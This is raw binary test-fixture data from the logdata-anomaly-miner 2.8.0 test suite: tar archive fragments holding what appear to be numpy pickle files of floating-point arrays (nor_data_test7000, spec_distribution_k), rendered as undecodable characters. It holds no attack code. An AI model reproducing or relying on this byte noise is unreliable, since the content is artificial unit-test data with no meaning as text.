qYqZRq[hhC<'ڿq\q]Rq^hhCmiv?q_q`RqahhC8@E޿qbqcRqdhhCY~غ-jڿqeqfRqghhC?'KqhqiRqjhhC|v?qkqlRqmhhCmҴ?qnqoRqphhCo?qqqrRqshhC%-"?qtquRqvhhC$zC?qwqxRqyhhC9h-?qzq{Rq|hhCBZ0'Nſq}q~RqhhC0k+jǿqqRqhhCVn#?qqRqhhC4?qqRqhhCQnʒqqRqhhC檔jqqRqhhC:p?qqRqhhCjq$qqRqhhC{qqRqhhCaC(qqRqhhCuj\qqRqhhC6Z?FqqRqhhC#dnqqRqhhCB]'&\?qqRqhhCJiɯۿqqRqhhC3qqRqhhCy?qqRqhhCX*ſqqRqhhC wqqRqhhC0:(sqqRqhhCTVkqqRqhhC{L?qqRqhhCxqqRqhhC{zjq†qRqhhC95qņqRqhhC*:-qȆqRqhhC^?qˆqRqhhClp?}qΆqRqhhC7MqцqRqhhCY qԆqRqhhCwYNq׆qRqhhCM̍?qچqRqhhC?q݆qRqhhCN?qqRqhhC}M/o?qqRqhhCR>ĿqqRqhhC%ڊqqRqhhCa6/?qqRqhhC|8Vo?qqRqhhC Y?qqRqhhC`?qqRqhhCbxZ ?qqRqhhCtL9+qqRqhhC+s{qqRrhhCҫ4@rrRrhhC')&rrRrhhC+bLLɿrrRr hhC@C{Կr r Rr hhC!vBr rRrhhC/Š~*rrRrhhCrrRrhhC ?rrRrhhC?$T?rrRrhhC ?rrRrhhC$L@rr Rr!hhCH1+??r"r#Rr$hhC̷&?r%r&Rr'hhCr(r)Rr*hhC[>u@?r+r,Rr-hhC쳚?r.r/Rr0hhCPVr1r2Rr3e.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/nor_data_test7000066400000000000000000000647021500476301700273300ustar00rootroot00000000000000i](](GyWQG$@9G?W66GiG? PGTGH:uG?z&˲G&[}G>, G?7̇ G?G?`[;G???jcGNG?햚'G?^7F.Gw-5G3 G,:Gՠ]PG?ѮG?RGtHT/G?ǟ Gʕ>nG-tL'GG?)$GU tG?d]=O1G?y,׵GnغGSG?bAG?|-ͶGA)G#w%*GpDG?$'G?ʲGw~Gӊy`G?mGgG?s&6G?גkGn0G?>G?7Gs6ɵCG?TtrNG?<)GG?jAtG?lIG\HpGǡG-GݧG?GrG?PIQG?dFQG?GѷT=D QG?qGg RmRGԾ܋$HG@fubVG?\6V G|G?u%G?eX G?l)$y\G̳}.GhdG?#tGG?۱&G@RxYwG?⵫1"GƱ TxG?XAGݰ'[G .G1'G??x5GE|F(G?XN 8G?;@sG7LGˀV=G6Rc Q G?K2G/*QG.VG?:G"HGUsGG?(@Gʵ诞pGFEk G?¡UGlG@ ,)eG?_GKyoG?KL+~G?”DG?O/vCGrwkG?!lVvGG?Ϲ~"G?3L%G?G?_GG?ܭ[GsH߽G?a<G?GCGn¬G?ñ3"G?ݔuG ؞GZj=|0G hG?+{kGҦG@)5G? 
q"G?ұG% #\5PGn}G>G?GG?}U ;G?ټG+* GVRtaG?=9G?ȷH x[G2%߫?GЩEGsjgOG?1;RG1&MޯG?;k G˨%>&G=:GgG?IKs"G?4F5xGU~G?XF_ G?aā]G!-$tGe.pG ]čG?\7jG6GGR4 GV ~ƙcG?Y)6 G?`懤G=D;RG?¤U.G?{!G7 5բGV&>G?,` 9G?UUvG?Q?CGN$FG?{זG?v{OGG G?`SviG?6(m G?vClG?GKն,GK+G\G?pMGZN1G1LG?87Gt:)GSQ]SPGƚf*GwYFGv!GawSl%Gސ ^G?¹ G?)3 G>ر-G"bGrvaG~]G2:~G FkCG.G`KwvG?gazGJLGtaߵG^cG?̣>[cGSGTaG@֛GcE.G?Ij G"GJSDyG#dPG'Rg#G? \A/G G?](zG?~QvOG={cw8GOf]`;G?nªSKG|+G?UGjY?G@CQTG h|{G8FdHaG?<@>G?ԍU<<^GĦ#G?hJxG?9rGڷ|GG? mGuGG?ǣGÓK^Ξ;G?'zG?-RyGRRG=GfZG r#TG??lGLPyLG?IGG5+]G?"/0G?4G?GFzG?WvG?kۦG>hQG=,.GpG?`GȃԻYGi&GB@5!eG6GHG?,ލyG@CG?G莩ZUG?MLGY L]G?ʉG?2, G?evG?⍭wb=G]GO 7ѰG?_$(nmG? koGD JGs/$GzG?b1GTUGCM|G?-A0G}UV G?WGhڌG~Gev5GZΈYG?+|t:G? \G?[ GEs>G?KeG^_GΰG?)mG?ʈPGB)GܕrLsGש-G4_D@G? LqG?=2G3QXG?b0IGߝHx GT}q G?xSt/G?悉L7GCCp%tGFqGxZ`G$4|GS)a[GƓDyG?CpGz{GR sG4pG?4i4@G?;*kG?DT*G?3p|6Go:G{(>G?4,:G?ɟOG?AG?ٿ-ƹG֠Yq\G?kGHG?B=G#v*IGx:cG?^)Gz3(G?9tG?lо7G2ŃG?Ȅ`CGG)TeG?`Nq4GjG?פ]%GɝQGG?ޜG?1RG@x4_!G? rXG?77 mGC7G4dG{G?pXG?0mWkGR6ƀG?}OG?qH:3*GTVUG?QnG?%yG?ZIVG?磑!IG0WGԿ\{G?cm/G? ]s7G?5&A%G_JYG?! RG?)AG?۩P\G?q9Gy1GĎc1GB|G?ddG?₵G86GYWRMnG?uS G@5;L0Gd3ftG-.bG?$rG?I6;G?ЂnGX'Gr˜cGPNNG?WGvtEG?=5 G?lJG a\=G}7GكqGElGЖOX}:G?cNQ8G-O]fG뵁G?ggMaG?w^-WG?g AGh""+GyT$%G%+GIDG?xI :G?64'GŠZ$(G?.>G?E=hG?鳁XdG?ٔBRG 6TG?KhG?bXG GʖS(Gd}3}G^}G|١G?׈pCPG?UGQG?G_78d5)GKIЉG,UG?ҽI GsG?̟zG? wGcGۓjG?WiUtG*UV8GW?@w G K2GGG?/s G{GWG@MIf{G?G G?J]I6cG[D[G?H|CG?y5GoչrG/4 GS^ GLR PGM0GhG@ 1!GAYsv]Gy*`G۝cG[څ[jG2K½G?6G)QG@.IjG}~UAG G? 
G+wذG?LqG?-&WGH2G?o9uG6l)>IG?nʡG ޢG&HGʬG?C@$bG?$YG?Z[G?eGKɅG\;aG?MG@Y6Gb*\1}G%;g\G"$ZG?aUG?孆G?^НG͞+*rG?I'&G?PGt(_N1GHG?sd}G@G?zQa/GeݢG?o2#4a`G?DM'G6bG|G@G?%G5 tGͼ;SǰGbG %[Gx;`~G@=~0G-A+ё~G?ՄPG;ryGܤ-Gǿ]GmGGs !=G?Q%rG?G@WCG G?ar,G?'IuG Pt%G?ZxG?%G١ -GG?K˃Gî1G?WSJ|G?` G?y#үeG?9 eG?GUjG?^$1aG^-G?@+SxG?4Q G?[;G?oJGԵeYGGԓk GҽmG?^蟭iG?3$l#G?΀?G@KiG?֧FC{G?MGG?l/GtFGӌT GCN rG?\Ĺ]jG"pG?.-G?½GܝRGJCG?-JbG?IͮӔGޓL G?ǃ_:G #ۖGח G?<@G?|ұ8!G:d$G?IG?eG?0 WPUGӰ\ɞ)G?܈wG?BKG?"R[AG!G?ܢk=?G7BBGEG2@G?-BG?چ=s:GG1Gsd-1G?NUGGbϻG?ZѭG?`(G?j̞G?ũ6Gre#%G?kgu/&G&^G?dT!GF4d9G2 BG?䄹`G&GI ?!G?3d oK Gƈ!jުG}~LG[г G?ǃGboYG?~1eXG?ِ%,rG]4G?7%#^GC2.sG?tWrG z1^G?z#G?1bLG?ܤ&G?$|8G?70hG?RR pG?qoA]5G? :bFpG?zSQzG?&iG?P~G =GG皠٘#G?Тb😉G?@r!GMܢĬIG?2qmGߔ'7G<}G-CG?,GGS-G?pTG?=mG?̱?bG却RQiG@\FGsNsEGRD7Gϣ1G]"gGƶ?TG?`* fGrS2CG?:@GX}GlNG?pcGG?3fTG?kyօGbG1G?jG譧GAf~AG?i!:G l GU5ʼG?|G?EY'GPIG#&şGe\G?kyG?'!tG?§:Gȅg8G@0r G?1EGHOG+oG,x_G1/&Gxn'Gwd5Gю}Gx.G?%@G?L!z)G?㴬4qGZHCOGگG{GiG&wnG?[0GdG?t@0GX7HGAHlG- G?X {G?!ǝgG@ G?y٤oGp[G-DrG?/!G?m3Gp"orGH%sCG@&ujGi(G"\@G?1(OGܚo2G6G7qxG lG@lhiGnw/G7G 0G?MY+G]3/EGsGy VG?7;/dgG>D(G?0+}GhsG? "Q-G?ٺ1 TvGlʩG?]*\X G&GGERG?΃:!Gb G?9NGd>GG;BG?eMG?OG?t4GcrG?dG?plG?*{&G?Osj?GAYG29G?`rh͒G@CAG?!7kFG=b]G?S5GA<@G/4 GH!G?*$TXG?DEWGJGS@G?QG?j4Ғ G?ONG?zpG>*#G?HNW_I7GfJ_G?'T&G@>G: Gj+G4GS#GеtGstА/G?؜=G̎GEV!OGшG?Ѓ;+G?sG@4_#|G? f>-G?3,>GweGmN2G7EG?ֶ onGiECEG?y%XP\G?G'YG?6AnG?pG?lGQG?2GA4TݸGaG?#)iGO]G?:)$.G?,4G? U|AGA(G@tI2UG?H5EG; ݢG6o0G?pb?G聯`GqhQG?GJG?xF&bG?9Ҭw'G?d)ߑ+GrJG?N1KGR#G?YG?$)n~GlxhGGڬG?r'G?[@G6@2RvG?ޏ)G?ywGJ3RڎG?j567G?19qGkS IG?9$b̄G?t1G+G?`q|G?ֺ_J:G|hoGI)ߚG}#>BdG?k-G?=G?ٍ T}G?2G?+G--bG?9iGs``x*G?DG?3\^G?ĊBtG bG7TG?I G?cFMG/`Gpz:G?ʽzGCXLG@Y[FGGGiiCGvɱFG~1)xG?Rf=G?i_HG]~/G?D'ݎG?F&G?nhW)6aG@ߔe(G4WfG \G )GXچTGёR0yG?$"+nGޫG?Q}G? *G'G?hGdݩ9G)G%վcGaK_G]#G?9GtpG?XGvGGk۟(y5Gj#G?a~B G?wgKGnGdCG?%/GӚ92Ghx]G?ՊnN'Gw|nG?zu@G`'2ChG?`)2G?[3GڎEaGOdG? UuCGĂ4G?NPkGOG?LjR˥G?ngG>QG33rrG!G?NT:GG?]ڐG?nG֟I8rIG@_G:nN(G?%iGۥ@!GFFJGsG?+ 7}GG?$G?ᮢaG?IGЄVCG?L<%Gv6GQu#\GtzI;GfQG?,CG?,#G? 
G?ӿG&G?ɲsMG?7G?}1G?~h,́G̊ÛGwG?% gG?3"UG?UWSG%(^G?VG?ݎ]G?.:G?FzWG:֪GCG?[GԺGqyH]G@*}y\G&WތGQ4G?/zlwG?80iG?zmc{G?~8GӸOĀG|PG? LG?=8G?@G4~FGQ.]DG?''`G??G?(GH5FObrG' aG?GG?q_uG-3"GB@s^G,G?v0GG?BKہ3G?ܰyGHw[G?)/SG?2ng/G?ϙZ@G9G5ϳG G?C޷G?!voGi4:G?TG(EJG?{m~aG?9VGGѥ@GSJG?̇Gm$G֛hG?嶎$ G?ꝨfG?*}CG?ZMNG?LvgG?F"'GؙjDSGC~mKGuwG?Ԛ[,G?H.G3$ ^G]G Gs֌жGCG8_n:G?JI{G㊌G?y("=cGIօpG?iG@K2G?-GF7jG?[OG9GPG?܏GHYG?vѨG&Y'G+dr-G; G?G?lj9jG6XG?7LcGsG?0#"G?%AtgG`}Q3G?ހ G?@'7xG?CvG?E Gd:G?ȳG?\kG?>ޥRGڢpGw&DG?q,#|G?[_G@zG?ϙ86WG28G?*G?߄U5zG2;2uG-whG?gٲٖGPAM۪G?\gG@G?QGvAGrN ƍGcCsGBY|֣G?,,~ޫG-G9{sG? qm)8G&6G?F; GSFGV/9G?+ G?>BG?c[[SG?:NG?mq~G엎KG?ߏGQ@G?s!\QG?tlFAG?ߊj]G?/GOG̋İz7G?I9YG?3G??5dGHGhIG?o3GJ`kGm9uG?)sG?LJJGyn GQ]G.ŦeG?|G?!> G?UG?JeGpG?vyZG]@G?OM@G?iZG?8H$ tG8*GS|G¼so+gG GXF^$G?ЩGUa\G?gXG?#WGG?|]PG?GOOG?>+GJskG\G<3G?+NG+]ėGnܡOG?@lEG'G?u_-EG?EvG,G|2KBG?3gLGQtKG?^MG] 6G~D.eG?k4t&}GGj.4ɂGK=LG?J4ebG?󆃊w_G?2unG?ݨ1GYmG?ޠWkG=ϹK-GM]NGp*GG@P[]aG?<KG2k\.G?뭡@;7G@:~df6G?$/6G_ G? s[?&KG?r.CG?@zf]G?WSG=~G?iG|M(G?"A<G?@@G3 G?3k!b Gڄ.{GbǠCG^1VsG`BaGB'2G!IGeG?бlG*HG?pMI}G?qAIG@'G?ض tG黳ݩoG?~JWG?.?zG ƶ G?Rm#G p0wG?OsqG cG?3@G@j"G?I*G?dzORG?M']RG?ꎣ$4IG?9 FG?%krGh^GKnGws-G@N_G%% NG?ߞ+4G?bG;1ueuG?߀(G?Ҍ0'G?sYGߕEAG?ؓPFG.ȩ?TG?`R8G?T G?֓hGe8 G?Ϣs5GftG@I>>G^G?6G$AzGw\}5 G3G?:"GΈNG\c:pG?xGf "G?kzWGBG?3OG:o(p^G?&>*EG?ᘪsG?KGD6GxUGSӈ*YG?.AGνGȸG/ Gھ.JeG?ÃwܤG8ZaG+SˆG?| OG?$,G0_zSG?єyT G?ǿeAGu˨jm"G?HG_PG?4NϒG?5'G ݛ"GZ>G?FY_G?i@d)GiBAGĞRGGcG?'YG9G@S7&G?b|iG۝5G?R\G?dGٍԜ,GG։0Gq5G?G?ǴG)G?'0V^#G?jv"G?$G?xojG? {5G?_y SG^MG?Xt&G|PkG? $5tZG I,̬GAg"4G٢bŏG?BG?^ $G?[D8HG> GcKYG uעGļnG? ηgGη/G[y~G?ZuG?TF=G?4W*G5-ClG#vzGUG#شG?cGAbGkӑpG?ߦJxG?sW}4GG?!wrG?YE"G??<GǁcG*G?Z2aG?Mϛ,GΌG?qF5GGG>9 G?b<G?m Gո"~~G?kG?s sG?}e^G??GG8hdGsN6AG?'G?u dmG?]{Gve) G}G?X ^VG? ɎG?ȣSgHG.MnG*^%)G 'G?טoGbuӳG?jzG`g3G?ikXG?{:nGQG.FGTI[eG?A%G 4CG?@dG?3ӄ.G?%UG?zjt-GFAG% ޯNG?CG_AջJG?q^G?L fGY#/kG鿖FG?5吰XG?GFx~G+>GdyDGώGSD!G.5G?᤹dܰG?i}2?TG?Q WG⻲)NxG?P)2G?ʖYOG?Ӧ%GGءRGۦG YʪG zG=%G? ©AG+h! G?;-o1G 5GuG5ciG@XYGIgwG?Q;G@ RG? 
qG?LxG wz"G  ٙG  Gi/G?ݷ82G?;9~Gծ {G?6zG?7;QGG1G@6Rr۔2G_G?<#^G?fG~iG8rG6?ZGD񔁵G? {G?5ޫdGcBG?ĈsYGcڃ4G?پ=G?=W!GwގGRrGH㳉G80G?C4GT3可5GۄzqWG?YwG?e G?/GGتG?ԯQGxcXG?Ӗ8B%dTG?PG?Y\EG?LVkG?=QG_.UAGsyóG?xzq G?U4ǷG?7@bG?e;G? M%G}G?@wkG\9G:әڡG?O;\˄G?-u?G;\wG@ioGtG!MG?ZX1G?wJG?4;WiG*R&(G?厯˓GJ4ؓG?.6nGΎΊG?\GӌeGdw ]G?^{#G?zmRwG?ߴ pGT]rG?&pG?yG?G#-ZGx0G?;G𡉃{G?UeGms͊G,jG?E-[G?LP2 G? (G?Q G?46SG?^0G?IbGg.zڍG?DG?.^JG?F:@GhG?3aTG?Jg~2(Gp GŐ]AG?r2G?|GƉ9O&G?P@9G?نV}=cGBmG?ds.HG?!$.2&Gc`G?uבGSG!nLG?lGXY'ʬG?`%-G?vKG&G?5 /oG*GQ{G+ήG%MgBG?E|Gqd-GxL,;G&?bG;(hG?q G?­!epG?@H͛G::mG?烝G?O_G!()>G?_dG?2WG? nLG?PfK(DG?㻦)ԍG;nG.uG?tڔyG?GVG?ϴG? \2G?K/G뜾G{G?B4GnG?GGΒ pG~]G?v7G;?OG?꠼GE뛲G?KWG9ϣyG@Y:ąG?s_`GZ*?.GohG-C"(G԰>%G/dmNG?e`pvGٲ?G??#G@udtwG19,3GWR@G?`vjG?E -)GP4GYG?ƩG?vGvm~G?hG?E|mc.G?nG6-lQguGl;W_3(GiRG@^GDaVYG-/GG@,X*G?|G{tVGُm!ѵGs G]G [z!2PGu+GOG?d%\G?BXGGY])G?z$z}G?ϬGflTG_bqG?ﲯlXG@B'G?yTuaGjPG?Ѵ7n-G?ñH×G ЖG?KGSVGu G?1wG?x*G̥-,qGмެG?ӪoG?.uG?EUd*^GPF\GuG?)?PG?MG}{+(G?R^G?rFG?uiЊG?A2>fGQG?5&}#d(GG GYjGZ:UG?,~QG?{^%LG?{>G? G?+VޫnGݽ@xfG'dG?tB9G|{GPsG,Q*G?4rG̳U 3G?d)G!aRGcVȃGrАG?uG&VxG?0MG@GhjGӟDFUG?"qGYG?0Gz[G?[NG) G?w G԰HG߿0TtGwzg-G?yp/(G?% (G9G?4pFLG?,K G6zݥ1G <ǃGDG?LDݍG?YѭG?oX]G?qG?[E2G2g;IvG?^|X>G>M "DG?X!lGtGǖO^G?̿44GM3KGGRKZG?>[{i G?G?"ɿ~/GOրG?3yjG?'G?I9G?ozhG?fUGP1RIG,9G} G?Dž+vprG?ŒC=G*OG?6JcG?U%eG֕duYG6{GϘ"ihG?>GVG$EGHm;G+G}ܣG?vGЍGcG?ׁ!eGS*L?xG? zuGזCňOG?dG?uIG?`H)GvfG܂:IaGG?Sd&N}GQ qG? vX~9GTvWG?Xv-RGewkG0*G1@HG!sRGH$_G?섫|bG/IGz뱒'G?ֲB@)GROG CG;]NG}`G?aGMGmthoG?\G?ɌJ\6oGb2 )iG?@G?];BtG$?G?b} G2DG?)5KG<G?&;G#^piG?%..gG?e:_G?ZQ G?{"hG?&}GjٟG?J,p[G?ˬQhG.فNG?4F1GЋ+nG?Y1G@ ywUG?9G?W]lHGȶ.G?SQyGpkGճ[#lG/EG%2sG?fWG?k;G?SaGU&hG\nG@s^JGl|G?kqmG?ʫX'*G䷦8G'ƻ@G?dQGG@sO.U5GrkHۡoG?9G?XNAkG?(F4GȪ+&G?fG?ja~gG?/o=G?ӓioG# G@(G'FG?E1Gp$Gn]G*G7BG?jKEG?s[ b_GzGE.%eGlG?h nUGӮ51GgG9qG?Ӡ8ǏuGw4QG?Չ=G?;cG [G[BG?'áG ZGxPG?)W G?d|G?+3GGB{a=G?6EG?P "x/GL=DrGC$6OeGA?G? G,NG0G{GyQG7i$iGڅ\b *G?eH|VG:5Ba4G?VJG@hGˣ({2G?NJlwG?UGuZGdAJGJHrGbG7aG! 
1G,/j];G?6=}[G?!lGMBRGwO54wG,k7+G@`x U]GXG[@JsGYlG?z02jaG,5Gi<^G?tGGz G4GG D !GG?nI@2GL.OzG?^G?jЋG?'HG1MG-ir@G?ZqdG?ǬG?_gG?(KGЀGȻuahG?A2G?GtG?<6G;9ƨG⢤TG\zaG?ҧe}YGy-G ʄG{iGsGƁk,G?Ny\G < G{dm-6eG?hG?긞.GZd}aG?i$GǚhG?4oGvTGF݃gG?uw'KGw1u'G?*idG@FBCG?MZ.G(fG?םtjG|LqG?^өG?ֈW;GvMeɊG?e.wI=GG?-\L-cG?tR G?)},ǷG@ٲ(oGlI8GF[G?{BvvG?2xGwG?,M*G{ljHGeo )G,uG?+ `G?;%YG鐪GVVGpIG啞SGC@tGj&G՟JG?4Gw'19G?T3 G?%7GY?G?$cG?GtGόHi$G}{0GE Gʣ}`aGI|ReG?)^eG?M=G0UG?EpqG?v,UGɥ:G^Ա~6GKG?̢GYG0G?RtQTG?X޾xG?ȁ[4xG?&GاX؀/GNr GWG@SAG?.-2}G?6yG U̟GG?IsG7bXG G?R^SGDm BGebgG?C`3vG/і4G?k,RpGз!R`1G?V5/G?ctG?,:؁G@Տ GbWnG_i\WGB GЄvG?ᗁNG?SFnG:G?Jc=8Gc*.G?f"B3+G;,`G?OpG?’wGArG5"N%AG?3lG-K"RG@q&G逧qOG?GnNG_7GfG?.2V9G?= G?l$G?ޣ8l3G? PG6$G?X&rG?(=G? +>KH6G?rWG>eG?3WGlG?d-bG*tMG&6FkG?탕ZGc89HGfTG?lT>G?.!GdㄯGuvvG֌ FlG? yG?{ݒ"DG?7rSG? CfwG?z7]G?ejG?ي;>G?RrCyGR"G?J{G?ЀT\G ˇUGڶ&Ge](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/spec_distribution_k000066400000000000000000000177371500476301700304640ustar00rootroot00000000000000cnumpy.core.multiarray _reconstruct qcnumpy ndarray qKqCbqqRq(KMqcnumpy dtype qXf8qKKq Rq (KẌ́g׼YNςV:im\P~7(n2?j#FQE!7g*3pWZcN%)nX ox.aІPjmrs@3TG|:̕!D oՎvG]XQPD9+Z.[* }oA}np-JXcW׮A=q\)1ᕇ$e*$|3 nppDcwW=fJY2G%B9 Q+[ p[s}f *ζ Z󿞮YeM/3@󿾷4Os斏;|+Hvԏm,2ie]q\ RP~C Z7򿞗[*Dj!`H|C Q%}epCNZbWo7Kr$>!@2yF%[ҫbvj4h RD܅4y/SpI8Uh,_:e>SrF,Bd'>񿍚L5H-~w[ nT2k Ϭ/wD];Q^\Q-sE o<3ȉ. ,#)\pvW52!|7s>{Bk;bԊ+VE-IyjA 8:Ns50𿚦Q'LV\Wۉ\? /q?P}"q=Ȋ d￾4R=Ԧ£}\|dWcᅢ{xRFYTA 3.0Ǻw￈kHh%.EJ X@Q&#wSk]Df4\RLSe93~"›wu U(LN*ِ'KىlFΛLe,?z^q1i_QXrG?6&D 0R g47'ۻX y쿨FeniG쿉l쿪 xlm>[.k_JF_9%-1 2.X뿶$v@vE7&Pfk)뿸R[HYd~ o뿼g+^}ALM=wLm<'+̮뿁 뿣Û12꿃L- SFqs^꿈@pւHIqjkX꿌RY?Mz. 4܇ a 꿎e:QF12S xRjF+Å鿗tXd}%S-YFB6@(@'k连^R :,~ZM迢d3nmyvw迤'֘fgrV(_K3EGF+i-ו*Lr翭bn^@<.:Zɰ4 3җzzSi翴3!-Xte H5@7Ea&翸33濺F}j&>ЩGh濿|Y\-5}濡6{[d?l K濄-:GsN)R:Mo)[! Id Mő忍vd4M'>U_vΈ6Hgr|MKU=忓.;,T@\v'N 忘XpSm!F!俛!A[3fb䪫>4j_x7P @W'/俣GH. O㿦Y(f|(- '.㿩lOj?fp㿌H!m㿮QSnB/2cM~5!m43v &`⿴פt69.orH<⿸!]٣gpV⿼]ʆE|`5>S9"$_: !ńAf3wP֖IǦj{ῇWGjIhY AHi7ῊZ'Ῥ#A: ,(q࿏lYO2? 
2HQTQė6 qW~ղMJxm࿕c#\࿷lyiJCu`)࿚&Za=6]v߿z"+߿4߿A@g߿ F߿FYF$߿kc1޿}1 ޿LߺoM޿@D"{޿QY޿W8޿Ue9T޿iݿ7xݿ\[ݿLmݿ`iKݿ *ݿ#"pܿg4>3ܿ&ܿkPhܿXJ_ܿ-k -ܿq}vboۿۿv@ۿz4ۿ8bۿ|Ʈ/ۿ'8D;ۿ|ڿJڿC5!ڿeڿqpsCڿ%"ڿ 4HڿNFQdٿX ٿOyٿ2UWٿ}5ٿY5ٿWؿٮؿdjؿ#6]kؿd¿8ؿN"ؿ]ڄ׿.,f׿p)׿2>j]׿3};׿E  ׿9XdqֿGֿ=wֿ|6qֿ8>ֿD ֿ&w=տHd)տ8տ h#tտOAտK^տSX Կq KԿ!?ԿZ3 #wԿ۔QUԿ^3ԿW:Կ#jw7ӿe|ERӿyӿi_Gӿnk%ӿcӿr}$ҿK ҿ|ҿxKK+[ҿ,l9ҿ}ҿ <ѿ3RsѿDE TѿW8Mѿ wz+ѿE ѿ |пOX`п&Âпaпc9tF?п&п!eϿ<ӽ|pϿY_ ϿG$οIbοPv+οRe.ۮͿډsvͿ]f 9Ϳ"̿h9F̿jF̿q}ʿ˿s@hM|˿ds˿~ױʿL"Znʿ5b*ʿGaɿ &ɿɿ@ȿd%vRȿ'ˊȿ|ǿTǿ1Ҍl"ǿ(ƿ7śOXƿ?aſtſņ}lſʈ(ſR5cĿ)^Ŀ]m)ÿ Aÿ6Pÿ/ ÿcBp=¿sއd¿zQ4O?ib_&4!ſ8GZ>>YVtN੽^j߼d4(hMv@szƘu ѤX 븿A y22V3a|F[M:͈5%T[Z,WaMo}̱2< |t 8&Y0ۮ.=ͭJ=KR:Xh@0m~d򦿪K]mȣ3Ng瞠~~'7-ܙ[@I!qlew1R}s8bYja;X?YRm?K' w??g~?W%?.c@k?kcPc_???o|?S?,+ݚ?o?HWul?({X-?3D£?#/W?_?h ?7?Ѣ?XaDު???o4Ԯ?-ч4?"OeF??6ɱ? 2?ק^?cn)?6y?I ?Ո??R?Tj?p/c? (]+?d]V?.|?sAG?;з?}@-ܼ?rq?gBq?\eZ;?)r?tZ=h?Bx?<+2?|?W(?3hcb?̞?/,?uœ?O?j|[n\?WV?_3#?'?';?Tv?NV?I?|&!?>Xza?3ޙ?3BP?j?( SM?m;?}#?X5 J?48?s?`Ůz?ĭ?($E?t}~_?Xf?i4TOt?7?^ K???S ?}Gn?HY6?aո?9IVO?uk?c1?WQϥ.???,3iL?e?Lv? A?^?,|I??/U?x?5v&F?cX-y?Q˫?l?th?)-? ]C?R@v?aEި?䵹{?-?@?VKTs?ш?vr, ?Jd=? RE[gp??w?-C??۷?? ,:?>zm?xp?4Ң?q7?l8j?)jY+?v?dAf?aR5?@2*g?-d>??2?+od?]Q?KW?ˌ?ƛ?*/?%a?d?R?x@=,?4.^?Qmx? ?mU?>[?J?a|&)??ۉd&?wY?VeD?@?.Sw#?K V? >|?%Pm?G'ܮ?4y?? ?4BZ#?L|??m0?Zl?Q&?Hk???v6-U .?U-FXG?4$_ɦ`?=D??±?k0?k%?J ??TkD?X]?Ŀqw?W?`??հC?j?%?v9~A?mRSZ?wdk t?3R?I;??V?-j ?$$C%?l3ޑ>?( eR/q?~ ~??:j?a ??iV"?ET?ۭ^Bn? ?w.?49?w?d&h8?[?"R?jIq?)7 B?.Đ?8.?|?_9gO?j۷?ۜOU?ҵ ?w}A?32?Kf|e?}?lwN?Jn?\|?I,@I?7^e{??%{?M??V>_?pd@??L{?K*?Qv?nc?_\??~ @\,@>R@W)l@|@%e@\vd@QZ@@P@+FC@<%QY@;

UUU6G(rXG+ީG?9T\G#EG?ޚzG4ĶF0G?/dG?H8G㢖68G?zR~~G(5sG?$G?IjKGܳG?HG?D%gGhuG?1ОG?D1MtG*cuG4lG?LtG?˭qKG?,Q ,Gīˢ:Gmb/G?6UNG?[`gGG?#cGę+0G @G?uG}!DG?UG?b;%\GJ{G?$zOG? ŞTG?snGc()G?Բ\G?oUү GoYGG?]VG?'Ew2G? `.IQTG?^f$GNG| dG?Ģk ҙG?s8\mG?cuX2\G?@G?ӗGɈwGGӽ3t#XG?5R"G?#FG?Q gOPGKG S0G?ĺG?GZ8G? =VG?w_rG?NXĄGҦ&͂Gv]EGoW@,G?U6gdNGݓ|f~GjbzGSLl GՅ/+cG} EΨG?`&]:G?߄HGAu?zG?i# (G?,I*G?lA@G?NG?ɥw}KGftG?Į:GLrPG?g}ҲGDG?ғьG?X(z6Gֺ{GG?ux`JGԁ\G뮢a(G?ڑG}G?(>#)G*ѳTG?}gPG?_DG?3]wG?sFG?ώwT(GcU@Gd20XG?Gt-zGL*m{G?\\6CZG?xxfG?0( GJ@(G?ḿ( mlG`lG&Ç5̺G EGS;0GxQG?)_W6GɈ\PGdt=GRTG?RG,~G?>#x3bG?vG?Ꭲ&GEt[ GĐ(G?\ G_ G?3yG= @G?;:G?zV*6G?̤A4P|G6G?[G!dGK53iGσ;G?FDG?$&CŔGBli?rGrW$G?кjM{G?'C/\G+0.7.Gp[7G ŔAG?\IjG?ÞLG?ТGHDG? rpTGPB`GMGo+XG?ЁG?}PGª2hG?;yPG7cG?M4 ;`G=]fsv(G@֩G 0G?M}͵G?ϧ[G#0+GO'3G?_VG?)dG?件gG?uG?0I(G?g(GsdGڊG?җ[VG? 8DTG6[u atG?rhG|dTGݧقG?(4G?&1 G?H_RG?Y G?$GG?[8>.G~8G @QyG@vG?XIVG?GI4ԤG?3U4G?jInG^'GNMGTG?rtGŀYB8G֤dopG?ledG?ߩtG?FNqG?Џ@!G?\ 9 Gpk.G~mfMG?1&%GnvG?0G?tКGl?as@G0fG?#OxGB X`G?sųG?KzXG?U[G]ƁG֒&<GsG[9oGʈG/\GgRhG viG?Ff@G?VG?hMˆ5G֔gTG?]^PG٦zGԂE8GncGG" G[GuW6.G?&t{RG??NNG?UpG?-PG?a gwGֻJ\G&gG?TrG6)JGcIG? G?eGwF`G?!wގG?=G?D1V:G#1: GijRLG?ՙhwG?vG2K%sG?"xG;9;G?V0GԺ|G֠$ G?15hG?M/S_GЛ(UG?#G8,TUG,0G?S`G#[$G?:dG?߉HKGVGWCwGѵq0G? ]hG!DLPG?͊ G?Ҕq$G?9DG?:Rh6Gzl%G?kFTG?ﳞG?YӀA8G?ED G?_uIDG?Щ>GylG? 1 G?3lG?8 @UG?u8G?(G?HMG? |xG? ]&kG6@G?KꂭG ɔ G?꽱))aGž;G.EG|uuNG?sQ;tG?h=kHGȿG?>5XG? vʀDGUnG?ڌE*GT7PG˲ϞGٹa`xG dRG;@odG'3G veTG?m*NGnG?UXG?ொG?߶{\G!KdG?&~G%G?(|$rG?eOn(TG?IuG?^GؕEuGռQ G?MJG?`\lXG?zHGĎKG?&)ǮGJk G?qlHGض.#DGc@tGsVKhG5tG}vG?i G?0G?[*G?{%XcG?.G?2 !G_lG?wb VGueG?tʔGፗ:G?&G?г̒1\G :ʁGQ `G?֯UU$Gҗ()Gޜ*G?zG?re>@G_RG?@GxkG?mj1nG*G`ў$G^G?vKGQw?Gy)G?V@G ?jG? U.HG&GH4ěVG?- G|Gxe G?f2G,vG6GSaiG? |G?+(GAnpG?cǝGHGdԸG?T]GdG.I1GXGS/PG?XG.DGZWĠG:lG.G?d;nGMB_rG?{-YGX|g.YG?y˜G~b GW!dXG?qq%G?eeJvG7? :G G@G?ҡ GfG?(7sGN 